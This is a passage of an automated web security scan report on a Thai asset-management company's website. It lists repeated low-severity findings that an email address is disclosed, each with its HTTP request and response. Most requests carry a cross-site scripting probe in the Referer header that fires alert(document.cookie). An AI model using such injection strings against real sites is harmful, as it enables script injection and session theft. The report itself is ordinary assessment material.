Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29472

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.63. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_flag_th.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_flag_th.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.64. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamnew.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_ktamnew.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.65. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamonline.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_ktamonline.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29482

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.66. http://www.ktam.co.th/en/index.php/ims/p_line001.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line001.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_line001.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.67. http://www.ktam.co.th/en/index.php/ims/p_line002.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line002.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_line002.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.68. http://www.ktam.co.th/en/index.php/ims/p_link01.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link01.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_link01.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:45 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.69. http://www.ktam.co.th/en/index.php/ims/p_link02.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link02.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_link02.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:45 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.70. http://www.ktam.co.th/en/index.php/ims/p_link03.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link03.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_link03.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.71. http://www.ktam.co.th/en/index.php/ims/p_link04.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link04.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_link04.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.72. http://www.ktam.co.th/en/index.php/ims/p_link05.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link05.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_link05.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.73. http://www.ktam.co.th/en/index.php/ims/p_link06.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link06.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_link06.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.74. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_logo1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_logo1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.75. http://www.ktam.co.th/en/index.php/ims/p_word1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_word1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/p_word1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.76. http://www.ktam.co.th/en/index.php/media_box.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/media_box.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/media_box.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:20 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.77. http://www.ktam.co.th/en/index.php/news.inc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.inc.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/news.inc.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.78. http://www.ktam.co.th/en/index.php/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:22 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29472

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.79. http://www.ktam.co.th/en/index.php/self_discovery.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/self_discovery.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/self_discovery.php HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eaf4f8f44d0f
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29484

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.80. http://www.ktam.co.th/en/index.php/style/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/style/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:18 GMT
